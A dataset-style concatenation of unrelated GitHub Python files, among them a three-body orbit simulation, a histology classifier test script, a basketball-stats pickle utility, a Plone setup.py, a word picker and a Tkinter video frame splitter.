drs = np.concatenate((dr1, dr2, dr3)) # Takes in tuple to combine into
dvs = np.concatenate((dv1, dv2, dv3)) # single array
return np.concatenate((drs, dvs)) # Returns all the differences at once
# Sun
r1 = np.array([0,0,0])
v1 = np.array([0,0,0])
m1 = 1
# Venus
r2 = np.array([0,0.723332,0])
v2 = np.array([1.176,0,0])
#v2=np.array([2.352,0,0]) # twice Venus' normal velocity
m2 = 2.4472e-6
# Earth
r3 = np.array([1,0,0])
v3 = np.array([0,1,0])
m3 = 3.00269e-6
# Setup equal masses at the points of an equalateral triangle
# with velocities following the edges
#m1 = m2 = m3 = 1
#r1 = np.array([0,0,0])
#r2 = np.array([1,0,0])
#r3 = np.array([0.5,np.sqrt(1-0.5**2),0])
#v1 = np.array([.5,0,0])
#v2 = np.array([-0.25,np.sqrt(3)/4,0])
#v3 = np.array([-0.25,-np.sqrt(3)/4,0])
# combining all of our arrays into one to pass into our ODE solver
init_rvs = np.concatenate((r1, r2, r3, v1, v2, v3))
# generates a linear prograssion of times from 0 to 20
# the units are technically years, but the 0-20 years is divided
# into 10,000 intervals, so these are 0.002 years, or about 17.5 hours
times = np.linspace(0,20,10000)
# We use odeint as it is typically faster than integrate, due to underlying
# Python implementation, even though integrate is technically newer and more
# versatile
solution = sci.integrate.odeint(body_calc, init_rvs, times, args=(m1,m2,m3))
# Here we want to extract out position values at each time step
#
# Explanation:
#
# Solutions is a multidimensional array, we can think of it as
# a Cx6 matrix, where C is some constant for how many time steps we have
# the 6 comes from our 6 values (r1, r2, r3, v1, v2, and v3)
# these values themselves are 3-dimensional vectors
# In reality, the 6 dimensions and 3 dimensions are actually 'flattened' into
# one 18-dimensional vector.
#
# So for r1_sol for example:
# we want the first 3 values of our 18-dimensional vector
# which correspond to x1,y1,z1
# and these values at each timestep appear in all C
# so we use " : " to say that we want to be checking every C timestep
# and we use " :3" to say we want the first 3 values (again, x1,y1,z1).
#
# for r2_sol:
# we again want every value at each timestep, so we start with " : "
# and we use "3:6" to say we want the 4th, 5th, and 6th values (x2,y2,z2)
#
# similarly for r3_sol, we use "6:9" to get 7th, 8th, and 9th values
# if we wanted v1, we could use "9:12", but that's not very useful for us
#
# (note: in Python, arrays begin indexing at 0, thus for example the value
# in index 2 is the third value.
# in this sense, we can say " :3" is the same as writing "0:3", with the end
# being non-inclusive, so we get a0,a1,a2
# and for "3:6", we get a3,a4,a5)
# (extra note: the technical reason that it makes sense to allow a comma here
# is that numpy arrays can actually take a "tuple" of slice boundaries)
r1_sol = solution[ : , :3]
r2_sol = solution[ : , 3:6]
r3_sol = solution[ : , 6:9]
fig = plt.figure()
axs = fig.add_subplot(111)
# Plotting the objects' paths
# similarly here, we extract the first, second, third coordinates
# using " : " to go through every timestep, and then 0, 1, 2 as
# the index for which coordinate we want: 0=x, 1=y, 2=z
axs.plot(r1_sol[ : , 0], r1_sol[ : , 1], color="#ffa500")
axs.plot(r2_sol[ : , 0], r2_sol[ : , 1], color="#808080")
axs.plot(r3_sol[ : , 0], r3_sol[ : , 1], color="b")
# Plotting the objects' final locations
# and the -1 here means get final timestep
axs.scatter(r1_sol[-1,0], r1_sol[-1,1], color="#ffa500")
axs.scatter(r2_sol[-1,0], r2_sol[-1,1], color="#808080")
axs.scatter(r3_sol[-1,0], r3_sol[-1,1], color="b")
plt.show()
| LoganSchmalz/threebody | threebody.py | threebody.py | py | 5,543 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "scipy.linalg.norm",
"line_number": 39,
"usage_type": "call"
},
{
"api_name": "scipy.linalg",
"line_number": 39,
"usage_type": "attribute"
},
{
"api_name": "scipy.linalg.norm",
"line_number": 40,
"usage_type": "call"
},
{
"api_name": "scipy.linalg",
... |
35515239669 | import argparse
from datetime import datetime
import os
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.utils.data
from model import Model
from dataset import Dataset
from tqdm import tqdm
from sklearn.metrics import confusion_matrix, roc_curve, auc
import numpy as np
import matplotlib.pyplot as plt
from sklearn import metrics
parser = argparse.ArgumentParser(description='Test a trained multi-resolution gland classification model.')
parser.add_argument('--init_model_file', default='',help='Initial model file (optional)', dest='init_model_file')
parser.add_argument('--image_dir_high', default='../../Images/gland_classification/cropped_patches__complete_and_partial_glands_50_25_512', help='Image directory', dest='image_dir_high')
parser.add_argument('--image_dir_medium', default='../../Images/gland_classification/cropped_patches__complete_and_partial_glands_50_50_512', help='Image directory', dest='image_dir_medium')
parser.add_argument('--image_dir_low', default='../../Images/gland_classification/cropped_patches__complete_and_partial_glands_50_100_512', help='Image directory', dest='image_dir_low')
parser.add_argument('--image_dir_low2', default='../../Images/gland_classification/cropped_patches__complete_and_partial_glands_50_200_512', help='Image directory', dest='image_dir_low2')
parser.add_argument('--slide_list_filename_test', default='../dataset/slide_ids_list_gland_classification_46_slides_test_saved.txt', help='slide list test', dest='slide_list_filename_test')
parser.add_argument('--dataset_type', default='test', help='', dest='dataset_type')
parser.add_argument('--num_classes', default='2', type=int, help='Number of classes', dest='num_classes')
parser.add_argument('--batch_size', default='32', type=int, help='Batch size', dest='batch_size')
parser.add_argument('--metrics_file', default='test_metrics', help='Text file to write test metrics', dest='metrics_file')
FLAGS = parser.parse_args()
model_name = FLAGS.init_model_file.split('/')[-1][15:-4]
out_dir = '{}/{}/{}'.format(FLAGS.metrics_file,model_name,FLAGS.dataset_type)
if not os.path.exists(out_dir):
os.makedirs(out_dir)
test_metrics_file = '{}/test_scores__{}.txt'.format(out_dir,model_name)
with open(test_metrics_file, 'w') as f:
f.write('# model_name: {}\n'.format(model_name))
f.write('# init_model_file: {}\n'.format(FLAGS.init_model_file))
f.write('# image_dir_high: {}\n'.format(FLAGS.image_dir_high))
f.write('# image_dir_medium: {}\n'.format(FLAGS.image_dir_medium))
f.write('# image_dir_low: {}\n'.format(FLAGS.image_dir_low))
f.write('# image_dir_low2: {}\n'.format(FLAGS.image_dir_low2))
f.write('# slide_list_filename_test: {}\n'.format(FLAGS.slide_list_filename_test))
f.write('# num_classes: {}\n'.format(FLAGS.num_classes))
f.write('# batch_size: {}\n'.format(FLAGS.batch_size))
f.write('# metrics_file: {}\n'.format(test_metrics_file))
f.write('# patient_id\tslide_id\timage_id\tlabel\tprediction\tscore_benign\tscore_malignant\n')
print('model_name: {}'.format(model_name))
print('init_model_file: {}'.format(FLAGS.init_model_file))
print('image_dir_high: {}'.format(FLAGS.image_dir_high))
print('image_dir_medium: {}'.format(FLAGS.image_dir_medium))
print('image_dir_low: {}'.format(FLAGS.image_dir_low))
print('image_dir_low2: {}'.format(FLAGS.image_dir_low2))
print('slide_list_filename_test: {}'.format(FLAGS.slide_list_filename_test))
print('num_classes: {}'.format(FLAGS.num_classes))
print('batch_size: {}'.format(FLAGS.batch_size))
print('metrics_file: {}'.format(test_metrics_file))
test_dataset = Dataset(img_dir_high=FLAGS.image_dir_high, img_dir_medium=FLAGS.image_dir_medium, img_dir_low=FLAGS.image_dir_low, img_dir_low2=FLAGS.image_dir_low2, slide_list_filename=FLAGS.slide_list_filename_test, transforms=False)
num_imgs_test = test_dataset.num_imgs
print("Test Data - num_imgs: {}".format(test_dataset.num_imgs))
# define data loaders
data_loader_test = torch.utils.data.DataLoader(test_dataset, batch_size=FLAGS.batch_size, shuffle=False, num_workers=1)
device = torch.device('cuda') if torch.cuda.is_available() else torch.device('cpu')
# get the model using our helper function
model = Model(pretrained=False, num_classes=FLAGS.num_classes, num_intermediate_features=64)
# move model to the right device
model.to(device)
if FLAGS.init_model_file:
if os.path.isfile(FLAGS.init_model_file):
state_dict = torch.load(FLAGS.init_model_file, map_location=lambda storage, loc: storage)
model.load_state_dict(state_dict['model_state_dict'])
print("Model weights loaded successfully from file: ", FLAGS.init_model_file)
print('******************** testing ********************')
pbar = tqdm(total=len(data_loader_test))
num_predictions = 0
running_correct_result = 0
label_list = []
predicted_result_list = []
probs_result_list = []
model.eval()
with torch.no_grad():
for i, (img_paths, img_high, img_medium, img_low, img_low2, label) in enumerate(data_loader_test):
img_high, img_medium, img_low, img_low2, label = img_high.to(device), img_medium.to(device), img_low.to(device), img_low2.to(device), label.to(device)
# get logits from the model
output_high, output_medium, output_low, output_low2, output_result = model(img_high, img_medium, img_low, img_low2)
# obtain probs
probs_result = F.softmax(output_result, dim=1)
# obtain predictions
_, predicted_result = torch.max(output_result, 1)
correct_result = (predicted_result == label).sum().item()
running_correct_result += correct_result
label_arr = label.cpu().numpy()
predicted_result_arr = predicted_result.cpu().numpy()
probs_result_arr = probs_result.cpu().numpy()
temp_num_predictions = label_arr.shape[0]
num_predictions += temp_num_predictions
label_list += list(label_arr)
predicted_result_list += list(predicted_result_arr)
probs_result_list += list(probs_result_arr)
for idx in range(temp_num_predictions):
with open(test_metrics_file, 'a') as f:
temp_img_path = img_paths[0][idx]
patient_id = temp_img_path.split('/')[-3].split('_')[1]
slide_id = temp_img_path.split('/')[-3].split('_')[3]
img_id = temp_img_path.split('/')[-1].split('.')[0]
f.write('{}\t{}\t{}\t{}\t{}\t{:0.4f}\t{:.4f}\n'.format(patient_id, slide_id, img_id, label_arr[idx], predicted_result_arr[idx], probs_result_arr[idx, 0], probs_result_arr[idx, 1]))
pbar.update(1)
pbar.close()
test_acc_result = running_correct_result / num_predictions
print('test_acc_result:{:.4f}'.format(test_acc_result))
# confusion matrix
cm_test = confusion_matrix(label_list, predicted_result_list, labels=[0,1])
print('cm_test:{}'.format(cm_test))
# per-class accuracy: TPR and TNR
class_acc_test = cm_test.diagonal() / cm_test.sum(1)
print('TNR:{:.4f}, TPR:{:.4f}'.format(class_acc_test[0],class_acc_test[1]))
# Receiver operating chracteristic curve and area under curve value
label_arr = np.array(label_list)
probs_result_arr = np.vstack(probs_result_list)
fpr, tpr, _ = roc_curve(label_arr, probs_result_arr[:,1])
roc_auc = auc(fpr, tpr)
test_metrics_summary_file = '{}/test_metrics_summary__{}.txt'.format(out_dir,model_name)
with open(test_metrics_summary_file, 'w') as f:
f.write('# model_name: {}\n'.format(model_name))
f.write('# init_model_file: {}\n'.format(FLAGS.init_model_file))
f.write('# image_dir_high: {}\n'.format(FLAGS.image_dir_high))
f.write('# image_dir_medium: {}\n'.format(FLAGS.image_dir_medium))
f.write('# image_dir_low: {}\n'.format(FLAGS.image_dir_low))
f.write('# image_dir_low2: {}\n'.format(FLAGS.image_dir_low2))
f.write('# slide_list_filename_test: {}\n'.format(FLAGS.slide_list_filename_test))
f.write('# num_classes: {}\n'.format(FLAGS.num_classes))
f.write('# batch_size: {}\n'.format(FLAGS.batch_size))
f.write('# test_metrics_summary_file: {}\n'.format(test_metrics_summary_file))
f.write('# test_acc_result\n')
f.write('{:.4f}\n'.format(test_acc_result))
f.write('# cm_test: cm_test[0,0]\tcm_test[0,1]\tcm_test[1,0]\tcm_test[1,1]\n')
f.write('{:d}\t{:d}\t{:d}\t{:d}\n'.format(cm_test[0,0],cm_test[0,1],cm_test[1,0],cm_test[1,1]))
f.write('# TNR\tTPR\n')
f.write('{:.4f}\t{:.4f}\n'.format(class_acc_test[0],class_acc_test[1]))
f.write('# roc_auc\n')
f.write('{:.4f}\n'.format(roc_auc))
plt.rcParams.update({'font.size':12,'axes.labelsize':12})
fig,ax = plt.subplots(figsize=(3,3))
lw = 2
ax.plot(fpr, tpr, color='darkorange', lw=lw, label='AUROC = %0.2f' % roc_auc)
ax.plot([0, 1], [0, 1], color='navy', lw=lw, linestyle='--')
ax.set_xlim([-0.05, 1.05])
ax.set_xticks(np.arange(0,1.05,0.2))
ax.set_ylim([-0.05, 1.05])
ax.set_yticks(np.arange(0,1.05,0.2))
ax.set_xlabel('FPR')
ax.set_ylabel('TPR')
ax.set_title('AUROC = %0.4f' % roc_auc)
# ax.legend(loc='lower right')
ax.grid()
fig.tight_layout()
fig_filename = '{}/ROC__{}.png'.format(out_dir,model_name)
fig.savefig(fig_filename, dpi=200)
fig_filename = '{}/ROC__{}.pdf'.format(out_dir,model_name)
fig.savefig(fig_filename, dpi=200)
# plt.show()
plt.close('all')
| onermustafaumit/MLNM | gland_classification/four_resolutions_model/test.py | test.py | py | 9,294 | python | en | code | 4 | github-code | 36 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "os.path.exists",
"line_number": 39,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 39,
"usage_type": "attribute"
},
{
"api_name": "os.makedirs",
... |
9856058749 | import re
import csv
import os
import sys
import pickle
from pprint import pprint
from enum import Enum
sys.path.insert(0, '../heatmap')
sys.path.insert(0, '../tests')
from stat_type_lookups import *
from tester import *
# Types of files:
# Fundamental files
# - PlayByPlay.csv, GameIDs.csv, BoxscoreStats.csv
# - Run after scraper
# - Generate pickles right after
# Enriched
# - PlayByPlay_enriched.csv
# - Run during enrich
# - Generate pickle right after
# Heatmap Stats
# - *_heatmap.csv
# - Run for relevent stats (can be all), for specific games and teams
# - Generate pickles right after
# Lineups
# - lineups_*.csv
# - That's up to Rossdan (assume it's his problem)
class CSVTypes(Enum):
Fundamentals = 0
Enriched = 1
Heatmap = 2
All = 3
class PickleParser:
def __init__(self, root, verbose = False):
self.root = root
self.verbose = verbose
# Lists of filenames
self.fundamentalFiles = ['PlayByPlay.csv', 'GameIDs.csv', 'BoxscoreStats.csv']
self.enrichedFiles = ['PlayByPlay_enriched.csv']
self.statFiles = list(stat_filenames.values())
for i in range(len(self.statFiles)):
self.statFiles[i] += '_heatmap.csv'
def IterateOverPickles(self, task):
for subdir, dirs, fs in os.walk(self.root):
for f in fs:
filename = os.path.join(subdir, f)
if task == 'save' and filename.endswith('.csv'):
self.Serialize(filename)
elif task == 'remove' and filename.endswith('.pickle'):
if self.verbose: print("Removing file: {}".format(filename))
os.remove(filename)
def SavePicklesInRoot(self):
self.IterateOverPickles('save')
def RemovePicklesFromRoot(self):
self.IterateOverPickles('remove')
def GetAllEnrichedFiles(self):
allEnrichedFiles = list(self.enrichedFiles)
for subdir, dirs, items in os.walk(self.root):
for item in items:
if re.match(".*PlayByPlay_enriched_game[\d]+\.csv", item):
allEnrichedFiles.append(item)
return allEnrichedFiles
def GetAllHeatmapFiles(self):
allHeatmapFiles = list(self.statFiles)
for subdir, dirs, items in os.walk(self.root):
for item in items:
if item.endswith("_heatmap.csv"):
allHeatmapFiles.append(item)
return allHeatmapFiles
def SaveTypesToPickles(self, types = []):
if type(types) != list: types = [types]
if types == [] or types == [CSVTypes.All.value]:
self.SaveTypesToPickles([CSVTypes.Fundamentals.value,
CSVTypes.Enriched.value,
CSVTypes.Heatmap.value])
if CSVTypes.Fundamentals.value in types:
self.Remove(self.fundamentalFiles, '.pickle')
self.Serialize(self.fundamentalFiles)
if CSVTypes.Enriched.value in types:
allEnrichedFiles = self.GetAllEnrichedFiles()
self.Remove(allEnrichedFiles, '.pickle')
self.Serialize(allEnrichedFiles)
if CSVTypes.Heatmap.value in types:
allEnrichedFiles = self.GetAllHeatmapFiles()
self.Remove(allEnrichedFiles, '.pickle')
self.Serialize(allEnrichedFiles)
def RemovePicklesOfType(self, csvType, fileType):
if fileType != '.csv': fileType = '.pickle'
if csvType == CSVTypes.All.value:
self.Remove([CSVTypes.Fundamentals.value,
CSVTypes.Enriched.value,
CSVTypes.Heatmap.value])
if csvType == CSVTypes.Fundamentals.value:
self.Remove(self.fundamentalFiles, fileType)
if csvType == CSVTypes.Enriched.value:
self.Remove(self.GetAllEnrichedFiles(), fileType)
if csvType == CSVTypes.Heatmap.value:
self.Remove(self.GetAllHeatmapFiles(), fileType)
def Remove(self, files = [], fileType = '.pickle'):
if type(files) == str: files = [files]
for csvF in files:
csvfilename = os.path.join(self.root, csvF)
filename = str(os.path.splitext(csvfilename)[0]) + fileType
if os.path.isfile(filename):
if self.verbose: print("Removing file: {}".format(filename))
os.remove(filename)
def RemovePickles(self, inVal = None):
if inVal == None:
self.RemovePicklesFromRoot()
else:
self.RemovePicklesOfType(inVal, '.pickle')
def Serialize(self, files = []):
if type(files) == str: files = [files]
for csvF in files:
csvfilename = os.path.join(self.root, csvF)
if not csvfilename.endswith('.csv') or not os.path.isfile(csvfilename):
continue
# Delete old pickle file of the same name if it exists
filename = str(os.path.splitext(csvfilename)[0]) + '.pickle'
if os.path.isfile(filename): os.remove(filename)
x = {}
header_flag = True
keys = []
last_gameID = -1
manualAddID = "PlayByPlay.pickle" in filename or \
os.path.basename(csvfilename) in self.GetAllEnrichedFiles() or \
os.path.basename(csvfilename) in self.GetAllHeatmapFiles()
with open(csvfilename,'rt') as f:
reader = csv.reader(f, delimiter=',')
for line in reader:
if header_flag:
header_flag = False
keys = line
else:
if manualAddID:
if line[0] != last_gameID: #New gameID
last_gameID = line[0]
x[line[0]] = []
x[line[0]].append(line[1:])
else:
x[line[0]].append(line[1:])
else:
x[line[0]] = {}
for i in range(1,len(line)):
x[line[0]][keys[i]] = line[i]
if self.verbose: print("Dumping {} data, hold on".format(filename))
with open(filename,'wb') as f:
pickle.dump(x, f, pickle.HIGHEST_PROTOCOL)
def LoadPickle(self, file = ''):
filename = os.path.join(self.root, file)
if not os.path.isfile(filename) or not filename.endswith('.pickle'):
if self.verbose: print("Unable to find pickle file {}".format(filename))
return dict()
if self.verbose: print("Loading data from {}, hold on".format(filename))
p = pickle.load( open( filename, "rb" ))
return p
if __name__=='__main__':
# Init
pickleParser = PickleParser('../data', False)
#################################################################
######################### Tests + demos #########################
#################################################################
t = Tester()
# Load empty pickle
print("Test 1")
t.Assert("Load empty pickle", pickleParser.LoadPickle('') == {})
# Remove empty pickle
print("Test 2")
pickleParser.Remove('')
t.Assert("Delete empty pickle", True)
# Create and remove a file (csv and pickle)
print("Test 3")
tempFileName = os.path.join(pickleParser.root, 'test.csv')
with open(tempFileName,'w') as f: f.write('')
pickleParser.Remove(tempFileName, '.csv')
t.Assert("Delete csv", not os.path.isfile(tempFileName))
tempFileName = os.path.join(pickleParser.root, 'test.pickle')
with open(tempFileName,'w') as f: f.write('')
pickleParser.Remove(tempFileName)
t.Assert("Delete pickle", not os.path.isfile(tempFileName))
# Load == Serialize for a file
print("Test 4")
serializeTestFile = 'turnovers_avg_heatmap'
initialRead = pickleParser.LoadPickle(serializeTestFile + '.pickle')
pickleParser.Serialize(serializeTestFile + '.csv')
rewriteAndRead = pickleParser.LoadPickle(serializeTestFile + '.pickle')
t.Assert("Seralize == Load for pickle reading", initialRead == rewriteAndRead)
# Delete stats pickles
print("Test 5")
pickleParser.RemovePicklesOfType(CSVTypes.Heatmap.value, '.pickle')
t.Assert("Delete stats pickles",
all(not os.path.isfile(os.path.join(pickleParser.root, str(os.path.splitext(x)[0]) + '.pickle')) for x in pickleParser.statFiles))
# Delete enriched pickle
print("Test 6")
pickleParser.RemovePicklesOfType(CSVTypes.Enriched.value, '.pickle')
t.Assert("Delete enriched pickles",
all(not os.path.isfile(os.path.join(pickleParser.root, str(os.path.splitext(x)[0]) + '.pickle')) for x in pickleParser.GetAllEnrichedFiles()))
# Delete fundamental pickles
print("Test 7")
pickleParser.RemovePicklesOfType(CSVTypes.Fundamentals.value, '.pickle')
t.Assert("Delete fundamental pickles",
all(not os.path.isfile(os.path.join(pickleParser.root, str(os.path.splitext(x)[0]) + '.pickle')) for x in pickleParser.fundamentalFiles))
# Pickles created during fundamentals serialization
print("Test 8")
pickleParser.SaveTypesToPickles(CSVTypes.Fundamentals.value)
t.Assert("Pickles created during fundamentals serialization",
all(os.path.isfile(os.path.join(pickleParser.root, str(os.path.splitext(x)[0]) + '.pickle')) for x in pickleParser.fundamentalFiles))
# Pickles created during enriched serialization
print("Test 9")
pickleParser.SaveTypesToPickles(CSVTypes.Enriched.value)
t.Assert("Pickles created during enriched serialization",
all(os.path.isfile(os.path.join(pickleParser.root, str(os.path.splitext(x)[0]) + '.pickle')) for x in pickleParser.GetAllEnrichedFiles()))
# Pickles created during stat serialization
print("Test 10")
pickleParser.SaveTypesToPickles(CSVTypes.Heatmap.value)
t.Assert("Pickles created during stat serialization",
all(os.path.isfile(os.path.join(pickleParser.root, str(os.path.splitext(x)[0]) + '.pickle')) for x in pickleParser.GetAllHeatmapFiles()))
# Delete all pickles from dir
print("Test 11")
pickleParser.RemovePicklesFromRoot()
t.Assert("Delete all pickles from dir",
all(not os.path.isfile(os.path.join(pickleParser.root, str(os.path.splitext(x)[0]) + '.pickle'))
for x in pickleParser.statFiles + pickleParser.enrichedFiles + pickleParser.fundamentalFiles))
# All pickles created from dir
print("Test 12")
pickleParser.SavePicklesInRoot()
t.Assert("All pickles created from dir",
all(os.path.isfile(os.path.join(pickleParser.root, str(os.path.splitext(x)[0]) + '.pickle'))
for x in pickleParser.GetAllHeatmapFiles() + pickleParser.GetAllEnrichedFiles() + pickleParser.fundamentalFiles))
print('\n')
t.ShowResults()
print("\nNote: There is a chance this failed because of setup. \n" + \
"I'm very lazy and don't want to create files for the sole purpose of testing," + \
"so just make sure to copy the files from ../_backup_data into ../data" + \
"and see if it still works then.")
#################################################################
#################################################################
| AdamCharron/CanadaBasketballStats | enrich/parse_to_yaml.py | parse_to_yaml.py | py | 11,609 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "sys.path.insert",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "sys.path.insert",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_numbe... |
42632745572 | from setuptools import setup, find_packages
version = '0.1'
long_description = (
open('README.rst').read()
+ '\n' +
'Contributors\n'
'============\n'
+ '\n' +
open('CONTRIBUTORS.rst').read()
+ '\n' +
open('CHANGES.rst').read()
+ '\n')
setup(
name='imio.dms.ws',
version=version,
description="",
long_description=long_description,
classifiers=[
"Environment :: Web Environment",
"Framework :: Plone",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 2.7",
"Topic :: Software Development :: Libraries :: Python Modules",
],
keywords='',
author='',
author_email='',
url='https://github.com/IMIO/imio.dms.ws',
license='gpl',
packages=find_packages(exclude=['ez_setup']),
namespace_packages=['imio', 'imio.dms'],
include_package_data=True,
zip_safe=False,
install_requires=[
'Plone',
'imio.wsrequest.core',
'plone.api',
'setuptools',
],
extras_require={'test': ['plone.app.testing']},
entry_points="""
# -*- Entry points: -*-
""",
)
| IMIO/imio.dms.ws | setup.py | setup.py | py | 1,189 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "setuptools.setup",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "setuptools.find_packages",
"line_number": 34,
"usage_type": "call"
}
] |
4513078370 | import json
import random
words = []
unavailableWordIndices = set()
rejectedWordIndices = set()
with open("words.js", "r") as f:
s = f.read()
s = s[s.find("["):s.rfind(",")] + "]"
words = json.loads(s)
with open("history.json", "r") as f:
history = json.load(f)
for item in history:
index = item.get("index")
if index is not None:
unavailableWordIndices.add(index)
with open("pool.json", "r") as f:
pool = json.load(f)
unavailableWordIndices.update(pool)
with open("solution.json", "r") as f:
solution = json.load(f)
for item in solution:
index = item.get("index")
if index is not None:
unavailableWordIndices.add(index)
with open("rejected.json") as f:
rejected = json.load(f)
rejectedWordIndices.update(rejected)
unavailableWordIndices.update(rejectedWordIndices)
availableWordIndices = [i for i in range(
len(words)) if i not in unavailableWordIndices]
random.shuffle(availableWordIndices)
poolAdditions = []
for index in availableWordIndices:
print(words[index])
quit = False
while True:
c = input("Verdict: ")
if c == "a":
poolAdditions.append(index)
break
elif c == "":
rejectedWordIndices.add(index)
break
elif c == "q":
quit = True
break
if quit:
break
reviewed = False
while not reviewed:
print("\n=====================================\n")
print("Review additions: ")
for i in range(len(poolAdditions)):
index = poolAdditions[i]
p = "X" if index in rejectedWordIndices else i
print(p, ": ", words[index])
amendments = input("Amendments: ")
if amendments == "":
reviewed = True
else:
try:
ais = [int(s) for s in amendments.split(' ')]
for ai in ais:
rejectedWordIndices.add(poolAdditions[ai])
except:
print("Invalid input")
continue
pool.extend([i for i in poolAdditions if i not in rejectedWordIndices])
with open("pool.json", "w") as f:
json.dump(pool, f, indent=2)
orderedRejected = sorted(rejectedWordIndices)
with open("rejected.json", "w") as f:
json.dump(orderedRejected, f, indent=2)
| mkacz91/slowle | picker.py | picker.py | py | 2,289 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "json.loads",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "json.load",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "json.load",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "json.load",
"line_number": 25,
... |
72809319784 | from typing import TYPE_CHECKING, Any, Dict, List, Type, TypeVar, Union
import attr
from ..models.reference_type import ReferenceType
from ..types import UNSET, Unset
if TYPE_CHECKING:
from ..models.key import Key
T = TypeVar("T", bound="Reference")
@attr.s(auto_attribs=True)
class Reference:
"""
Attributes:
referred_semantic_id (Union[Unset, Reference]):
type (Union[Unset, ReferenceType]):
keys (Union[Unset, List['Key']]):
"""
referred_semantic_id: Union[Unset, "Reference"] = UNSET
type: Union[Unset, ReferenceType] = UNSET
keys: Union[Unset, List["Key"]] = UNSET
additional_properties: Dict[str, Any] = attr.ib(init=False, factory=dict)
def to_dict(self) -> Dict[str, Any]:
referred_semantic_id: Union[Unset, Dict[str, Any]] = UNSET
if not isinstance(self.referred_semantic_id, Unset):
referred_semantic_id = self.referred_semantic_id.to_dict()
type: Union[Unset, str] = UNSET
if not isinstance(self.type, Unset):
type = self.type.value
keys: Union[Unset, List[Dict[str, Any]]] = UNSET
if not isinstance(self.keys, Unset):
keys = []
for keys_item_data in self.keys:
keys_item = keys_item_data.to_dict()
keys.append(keys_item)
field_dict: Dict[str, Any] = {}
field_dict.update(self.additional_properties)
field_dict.update({})
if referred_semantic_id is not UNSET:
field_dict["referredSemanticId"] = referred_semantic_id
if type is not UNSET:
field_dict["type"] = type
if keys is not UNSET:
field_dict["keys"] = keys
return field_dict
@classmethod
def from_dict(cls: Type[T], src_dict: Dict[str, Any]) -> T:
from ..models.key import Key
d = src_dict.copy()
_referred_semantic_id = d.pop("referredSemanticId", UNSET)
referred_semantic_id: Union[Unset, Reference]
if isinstance(_referred_semantic_id, Unset):
referred_semantic_id = UNSET
else:
referred_semantic_id = Reference.from_dict(_referred_semantic_id)
_type = d.pop("type", UNSET)
type: Union[Unset, ReferenceType]
if isinstance(_type, Unset):
type = UNSET
else:
type = ReferenceType(_type)
keys = []
_keys = d.pop("keys", UNSET)
for keys_item_data in _keys or []:
keys_item = Key.from_dict(keys_item_data)
keys.append(keys_item)
reference = cls(
referred_semantic_id=referred_semantic_id,
type=type,
keys=keys,
)
reference.additional_properties = d
return reference
@property
def additional_keys(self) -> List[str]:
return list(self.additional_properties.keys())
def __getitem__(self, key: str) -> Any:
return self.additional_properties[key]
def __setitem__(self, key: str, value: Any) -> None:
self.additional_properties[key] = value
def __delitem__(self, key: str) -> None:
del self.additional_properties[key]
def __contains__(self, key: str) -> bool:
return key in self.additional_properties
| sdm4fzi/aas2openapi | ba-syx-submodel-repository-client/ba_syx_submodel_repository_client/models/reference.py | reference.py | py | 3,280 | python | en | code | 7 | github-code | 36 | [
{
"api_name": "typing.TYPE_CHECKING",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "typing.TypeVar",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "typing.Union",
"line_number": 24,
"usage_type": "name"
},
{
"api_name": "types.Unset",
"li... |
12316087861 | import tkinter as tk
from tkinter import ttk
from tkinter import filedialog
import os
import glob
import cv2
import math
import csv
import re
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
from tensorflow.keras.applications.imagenet_utils import preprocess_input, decode_predictions
from tensorflow.keras.models import load_model
from tensorflow.keras.preprocessing import image
from tensorflow.keras.applications.resnet50 import ResNet50
from keras.utils import np_utils
from skimage.transform import resize
from sklearn.model_selection import train_test_split
from tensorflow.keras.layers import Dense, InputLayer, Dropout
from tensorflow.keras.models import Sequential
def load_train_tab(tab_train, root):
def browse_directory():
global selected_directory
filepath = filedialog.askdirectory(title="Select a directory")
if filepath:
print("Selected file:", filepath)
selected_directory = filepath # Save the directory name to the global variable
directory_entry.delete(0, tk.END)
directory_entry.insert(0, filepath)
# Update the video files list
video_files.config(state="normal") # Set the state to normal before inserting text
video_files.delete(1.0, tk.END)
for file in os.listdir(filepath):
if file.endswith(".mp4") or file.endswith(".avi") or file.endswith(".mkv"):
video_files.insert(tk.END, file + "\n")
video_files.config(state="disabled") # Set the state back to disabled after inserting text
def frame_split():
# Create a progress bar popup window
progress_window = tk.Toplevel(root)
progress_window.title("Splitting Videos")
progress_label = ttk.Label(progress_window, text="Splitting video into frames...")
progress_label.pack(padx=10, pady=(10, 0))
progress = ttk.Progressbar(progress_window, mode="indeterminate", length=300)
progress.pack(padx=10, pady=(5, 10))
progress.start(10)
progress_window.update()
#check if train/frames path exists, if not, create it
if os.path.exists(selected_directory + "/train/frames/") == False:
print("/train/frames folder does not exist. Creating...")
os.makedirs(selected_directory + "/train/frames/")
else:
print("train/frames folder already exists")
#capture video files in chosen directory
count = 0
cap = [cv2.VideoCapture(videoFile) for videoFile in glob.glob(os.path.join(selected_directory, "*.mp4"))] # capturing the video from the given path
#split the frames from each video then output to train/frames folder
for i in cap:
print(str(i))
frameRate = i.get(5)
while (i.isOpened()):
frameID = i.get(1)
ret, frame = i.read()
if (ret != True):
break
if (frameID % math.floor(frameRate) == 0):
filename = selected_directory + "/train/frames/frame%d.jpg" % (count); count +=1
cv2.imwrite(filename, frame)
i.release()
#create the excel file from split frames
print("Creating excel file for classification...")
header = ['Image_ID', 'Class']
data = []
for i in os.listdir(selected_directory + "/train/frames"):
data.append(str(i))
data.sort(key=lambda f: int(re.sub('\D', '', f)))
data2 = []
for i in data:
data2.append([i])
